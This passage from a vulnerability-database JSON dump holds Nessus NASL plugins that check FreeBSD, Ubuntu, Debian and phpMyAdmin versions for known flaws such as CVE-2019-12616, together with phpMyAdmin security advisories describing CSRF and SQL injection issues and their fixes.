Summary CSRF vulnerability\nin login form Description A vulnerability was found that allows an\nattacker to trigger a CSRF attack against a phpMyAdmin user. The\nattacker can trick the user, for instance through a broken <img> tag\npointing at the victim's phpMyAdmin database, and the attacker can\npotentially deliver a payload (such as a specific INSERT or DELETE\nstatement) through the victim. Severity We consider this vulnerability\nto be severe. Mitigation factor Only the 'cookie' auth_type is\naffected; users can temporary use phpMyAdmin's http authentication as\na workaround.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2019-4/\"\n );\n # https://vuxml.freebsd.org/freebsd/a5681027-8e03-11e9-85f4-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b30ce070\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin-php56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin-php70\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin-php71\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin-php72\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin<4.9.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin-php56<4.9.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin-php70<4.9.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin-php71<4.9.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin-php72<4.9.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-03-01T05:22:32", "description": "According to its self-reported version number, the phpMyAdmin application hosted on the remote\nweb server is 4.x prior to 4.9.0. It is, therefore, affected by a cross-site request forgery (XSRF)\nvulnerability. A remote attacker can exploit this by tricking a user into visiting a specially\ncrafted web page, allowing the attacker to disclose sensitive information, impersonate the user's\nidentity, or inject malicious content into the victim's web browser.\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.", "edition": 19, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"}, "published": "2019-06-13T00:00:00", "title": "phpMyAdmin 4.x < 4.9.0 CSRF vulnerablity (PMASA-2019-4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12616"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2019_4.NASL", "href": "https://www.tenable.com/plugins/nessus/125856", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125856);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/06/18 10:31:32\");\n\n script_cve_id(\"CVE-2019-12616\");\n script_bugtraq_id(108619);\n\n script_name(english:\"phpMyAdmin 4.x < 4.9.0 CSRF vulnerablity (PMASA-2019-4)\");\n script_summary(english:\"Checks the version of phpMyAdmin.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by a CSRF vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin application hosted on the remote\nweb server is 4.x prior to 4.9.0. It is, therefore, affected by a cross-site request forgery (XSRF)\nvulnerability. A remote attacker can exploit this by tricking a user into visiting a specially\ncrafted web page, allowing the attacker to disclose sensitive information, impersonate the user's\nidentity, or inject malicious content into the victim's web browser.\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n # https://www.phpmyadmin.net/security/PMASA-2019-4/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?66181e00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to phpMyAdmin version 4.9.0 or later.\nAlternatively, apply the patches referenced in the vendor advisories.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-12616\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\", \"installed_sw/phpMyAdmin\");\n\n exit(0);\n}\ninclude('http.inc');\ninclude('vcf.inc');\n\nport = get_http_port(default:80, php:TRUE);\nappname = 'phpMyAdmin';\napp_info = vcf::get_app_info(app:appname, port:port, webapp:TRUE);\n\nconstraints = [{'min_version':'4.0', 'fixed_version':'4.9.0'}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{xsrf:TRUE});\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-11-25T15:14:40", "description": "The remote Ubuntu 18.04 LTS host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe USN-4639-1 advisory.\n\n - Cross-site scripting (XSS) vulnerability in db_central_columns.php in phpMyAdmin before 4.7.8 allows\n remote authenticated users to inject arbitrary web script or HTML via a crafted URL. (CVE-2018-7260)\n\n - An attacker can exploit phpMyAdmin before 4.8.4 to leak the contents of a local file because of an error\n in the transformation feature. The attacker must have access to the phpMyAdmin Configuration Storage\n tables, although these can easily be created in any database to which the attacker has access. An attacker\n must have valid credentials to log in to phpMyAdmin; this vulnerability does not allow an attacker to\n circumvent the login system. (CVE-2018-19968)\n\n - In phpMyAdmin before 4.8.4, an XSS vulnerability was found in the navigation tree, where an attacker can\n deliver a payload to a user through a crafted database/table name. (CVE-2018-19970)\n\n - An issue was discovered in phpMyAdmin before 4.8.5. A vulnerability was reported where a specially crafted\n username can be used to trigger a SQL injection attack through the designer feature. (CVE-2019-6798)\n\n - An issue was discovered in phpMyAdmin before 4.8.5. When the AllowArbitraryServer configuration setting is\n set to true, with the use of a rogue MySQL server, an attacker can read any file on the server that the\n web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the\n inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFILE calls. (CVE-2019-6799)\n\n - An issue was discovered in phpMyAdmin before 4.9.0.1. A vulnerability was reported where a specially\n crafted database name can be used to trigger an SQL injection attack through the designer feature.\n (CVE-2019-11768)\n\n - An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to\n trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a\n broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a\n payload (such as a specific INSERT or DELETE statement) to the victim. (CVE-2019-12616)\n\n - In phpMyAdmin 4 before 4.9.4 and 5 before 5.0.1, SQL injection exists in the user accounts page. A\n malicious user could inject custom SQL in place of their own username when creating queries to this page.\n An attacker must have a valid MySQL account to access the server. (CVE-2020-5504)\n\n - In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability has been discovered\n where certain parameters are not properly escaped when generating certain queries for search actions in\n libraries/classes/Controllers/Table/TableSearchController.php. An attacker can generate a crafted database\n or table name. The attack can be performed if a user attempts certain search operations on the malicious\n database or table. (CVE-2020-10802)\n\n - In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability was discovered where\n malicious code could be used to trigger an XSS attack through retrieving and displaying results (in\n tbl_get_field.php and libraries/classes/Display/Results.php). The attacker must be able to insert crafted\n data into certain database tables, which when retrieved (for instance, through the Browse tab) can trigger\n the XSS attack. (CVE-2020-10803)\n\n - In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability was found in retrieval\n of the current username (in libraries/classes/Server/Privileges.php and\n libraries/classes/UserPassword.php). A malicious user with access to the server could create a crafted\n username, and then trick the victim into performing specific actions with that user account (such as\n editing its privileges). (CVE-2020-10804)\n\n - phpMyAdmin before 4.9.6 and 5.x before 5.0.3 allows XSS through the transformation feature via a crafted\n link. (CVE-2020-26934)\n\n - An issue was discovered in SearchController in phpMyAdmin before 4.9.6 and 5.x before 5.0.3. A SQL\n injection vulnerability was discovered in how phpMyAdmin processes SQL statements in the search feature.\n An attacker could use this flaw to inject malicious SQL in to a query. (CVE-2020-26935)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-19T00:00:00", "title": "Ubuntu 18.04 LTS : phpMyAdmin vulnerabilities (USN-4639-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7260", "CVE-2020-10804", "CVE-2020-10802", "CVE-2019-12616", "CVE-2018-19970", "CVE-2020-26935", "CVE-2019-6798", "CVE-2019-6799", "CVE-2020-5504", "CVE-2020-26934", "CVE-2019-11768", "CVE-2020-10803", "CVE-2018-19968"], "modified": "2020-11-19T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:phpmyadmin"], "id": "UBUNTU_USN-4639-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143119", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4639-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143119);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/24\");\n\n script_cve_id(\n \"CVE-2018-7260\",\n \"CVE-2018-19968\",\n \"CVE-2018-19970\",\n \"CVE-2019-6798\",\n \"CVE-2019-6799\",\n \"CVE-2019-11768\",\n \"CVE-2019-12616\",\n \"CVE-2020-5504\",\n \"CVE-2020-10802\",\n \"CVE-2020-10803\",\n \"CVE-2020-10804\",\n \"CVE-2020-26934\",\n \"CVE-2020-26935\"\n );\n script_bugtraq_id(\n 103099,\n 106178,\n 106181,\n 106727,\n 106736,\n 108617,\n 108619\n );\n script_xref(name:\"USN\", value:\"4639-1\");\n\n script_name(english:\"Ubuntu 18.04 LTS : phpMyAdmin vulnerabilities (USN-4639-1)\");\n script_summary(english:\"Checks the dpkg output for the updated package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 18.04 LTS host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe USN-4639-1 advisory.\n\n - Cross-site scripting (XSS) vulnerability in db_central_columns.php in phpMyAdmin before 4.7.8 allows\n remote authenticated users to inject arbitrary web script or HTML via a crafted URL. (CVE-2018-7260)\n\n - An attacker can exploit phpMyAdmin before 4.8.4 to leak the contents of a local file because of an error\n in the transformation feature. The attacker must have access to the phpMyAdmin Configuration Storage\n tables, although these can easily be created in any database to which the attacker has access. An attacker\n must have valid credentials to log in to phpMyAdmin; this vulnerability does not allow an attacker to\n circumvent the login system. (CVE-2018-19968)\n\n - In phpMyAdmin before 4.8.4, an XSS vulnerability was found in the navigation tree, where an attacker can\n deliver a payload to a user through a crafted database/table name. (CVE-2018-19970)\n\n - An issue was discovered in phpMyAdmin before 4.8.5. A vulnerability was reported where a specially crafted\n username can be used to trigger a SQL injection attack through the designer feature. (CVE-2019-6798)\n\n - An issue was discovered in phpMyAdmin before 4.8.5. When the AllowArbitraryServer configuration setting is\n set to true, with the use of a rogue MySQL server, an attacker can read any file on the server that the\n web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the\n inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFILE calls. (CVE-2019-6799)\n\n - An issue was discovered in phpMyAdmin before 4.9.0.1. A vulnerability was reported where a specially\n crafted database name can be used to trigger an SQL injection attack through the designer feature.\n (CVE-2019-11768)\n\n - An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to\n trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a\n broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a\n payload (such as a specific INSERT or DELETE statement) to the victim. (CVE-2019-12616)\n\n - In phpMyAdmin 4 before 4.9.4 and 5 before 5.0.1, SQL injection exists in the user accounts page. A\n malicious user could inject custom SQL in place of their own username when creating queries to this page.\n An attacker must have a valid MySQL account to access the server. (CVE-2020-5504)\n\n - In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability has been discovered\n where certain parameters are not properly escaped when generating certain queries for search actions in\n libraries/classes/Controllers/Table/TableSearchController.php. An attacker can generate a crafted database\n or table name. The attack can be performed if a user attempts certain search operations on the malicious\n database or table. (CVE-2020-10802)\n\n - In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability was discovered where\n malicious code could be used to trigger an XSS attack through retrieving and displaying results (in\n tbl_get_field.php and libraries/classes/Display/Results.php). The attacker must be able to insert crafted\n data into certain database tables, which when retrieved (for instance, through the Browse tab) can trigger\n the XSS attack. (CVE-2020-10803)\n\n - In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability was found in retrieval\n of the current username (in libraries/classes/Server/Privileges.php and\n libraries/classes/UserPassword.php). A malicious user with access to the server could create a crafted\n username, and then trick the victim into performing specific actions with that user account (such as\n editing its privileges). (CVE-2020-10804)\n\n - phpMyAdmin before 4.9.6 and 5.x before 5.0.3 allows XSS through the transformation feature via a crafted\n link. (CVE-2020-26934)\n\n - An issue was discovered in SearchController in phpMyAdmin before 4.9.6 and 5.x before 5.0.3. A SQL\n injection vulnerability was discovered in how phpMyAdmin processes SQL statements in the search feature.\n An attacker could use this flaw to inject malicious SQL in to a query. (CVE-2020-26935)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4639-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected phpmyadmin package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-26935\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:phpmyadmin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020 Canonical, Inc. / NASL script (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 18.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '18.04', 'pkgname': 'phpmyadmin', 'pkgver': '4:4.6.6-5ubuntu0.5'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'phpmyadmin');\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:40:52", "description": "Multiple security vulnerabilities were fixed in phpmyadmin, a MySQL\nweb administration tool, which prevent possible SQL injection attacks,\nCSRF, the bypass of user restrictions, information disclosure or\ndenial of service.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n4:4.2.12-2+deb8u6.\n\nWe recommend that you upgrade your phpmyadmin packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 16, "cvss3": {"score": 7.5, "vector": "AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-18T00:00:00", "title": "Debian DLA-1821-1 : phpmyadmin security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6612", "CVE-2016-6611", "CVE-2016-6630", "CVE-2016-6632", "CVE-2019-12616", "CVE-2016-9850", "CVE-2016-6607", "CVE-2016-6613", "CVE-2016-6606", "CVE-2016-9864", "CVE-2016-6626", "CVE-2016-9861", "CVE-2016-6627", "CVE-2016-9849", "CVE-2016-6628", "CVE-2016-6624", "CVE-2016-6631"], "modified": "2019-06-18T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:phpmyadmin"], "id": "DEBIAN_DLA-1821.NASL", "href": "https://www.tenable.com/plugins/nessus/125957", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1821-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125957);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6606\", \"CVE-2016-6607\", \"CVE-2016-6611\", \"CVE-2016-6612\", \"CVE-2016-6613\", \"CVE-2016-6624\", \"CVE-2016-6626\", \"CVE-2016-6627\", \"CVE-2016-6628\", \"CVE-2016-6630\", \"CVE-2016-6631\", \"CVE-2016-6632\", \"CVE-2016-9849\", \"CVE-2016-9850\", \"CVE-2016-9861\", \"CVE-2016-9864\", \"CVE-2019-12616\");\n\n script_name(english:\"Debian DLA-1821-1 : phpmyadmin security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security vulnerabilities were fixed in phpmyadmin, a MySQL\nweb administration tool, which prevent possible SQL injection attacks,\nCSRF, the bypass of user restrictions, information disclosure or\ndenial of service.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n4:4.2.12-2+deb8u6.\n\nWe recommend that you upgrade your phpmyadmin packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/06/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/phpmyadmin\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected phpmyadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-6631\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"phpmyadmin\", reference:\"4:4.2.12-2+deb8u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "phpmyadmin": [{"lastseen": "2019-06-07T15:19:27", "bulletinFamily": "software", "cvelist": ["CVE-2019-11768"], "description": "## PMASA-2019-3\n\n**Announcement-ID:** PMASA-2019-3\n\n**Date:** 2019-05-06\n\n### Summary\n\nSQL injection in Designer feature\n\n### Description\n\nA vulnerability was reported where a specially crafted database name can be used to trigger an SQL injection attack through the designer feature.\n\n### Severity\n\nWe consider this vulnerability to be serious\n\n### Affected Versions\n\nphpMyAdmin versions prior to 4.8.6 are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 4.8.6 or newer or apply patch listed below.\n\n### References\n\nThanks to phpMyAdmin team member [William Desportes](<https://william.wdes.fr/?from=PMASA-2019-3>) for finding this vulnerability.\n\nAssigned CVE ids: [CVE-2019-11768](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11768>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>)\n\n### Patches\n\nThe following commits have been made on the 4.8 branch to fix this issue:\n\n * [c1ecafc38319e8f768c9259d4d580e42acd5ee86](<https://github.com/phpmyadmin/phpmyadmin/commit/c1ecafc38319e8f768c9259d4d580e42acd5ee86>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "edition": 2, "modified": "2019-05-06T00:00:00", "published": "2019-05-06T00:00:00", "id": "PHPMYADMIN:PMASA-2019-3", "href": "https://www.phpmyadmin.net/security/PMASA-2019-3/", "title": "SQL injection in Designer feature", "type": "phpmyadmin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-16T04:43:43", "bulletinFamily": "software", "cvelist": ["CVE-2019-12616"], "description": "## PMASA-2019-4\n\n**Announcement-ID:** PMASA-2019-4\n\n**Date:** 2019-06-04\n\n### Summary\n\nCSRF vulnerability in login form\n\n### Description\n\nA vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken `<img>` tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.\n\n### Severity\n\nWe consider this vulnerability to be severe.\n\n### Mitigation factor\n\nOnly the 'cookie' auth_type is affected; users can temporary use phpMyAdmin's http authentication as a workaround.\n\n### Affected Versions\n\nAll versions prior to phpMyAdmin 4.9.0 are affected, probably at least as old as version 4.0 (perhaps even earlier)\n\n### Solution\n\nUpgrade to phpMyAdmin 4.9.0 or newer or apply patch listed below.\n\n### References\n\nThanks to [Mauro Tempesta](<https://twitter.com/mau_tempesta>) for reporting this vulnerability\n\nAssigned CVE ids: [CVE-2019-12616](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12616>)\n\nCWE ids: 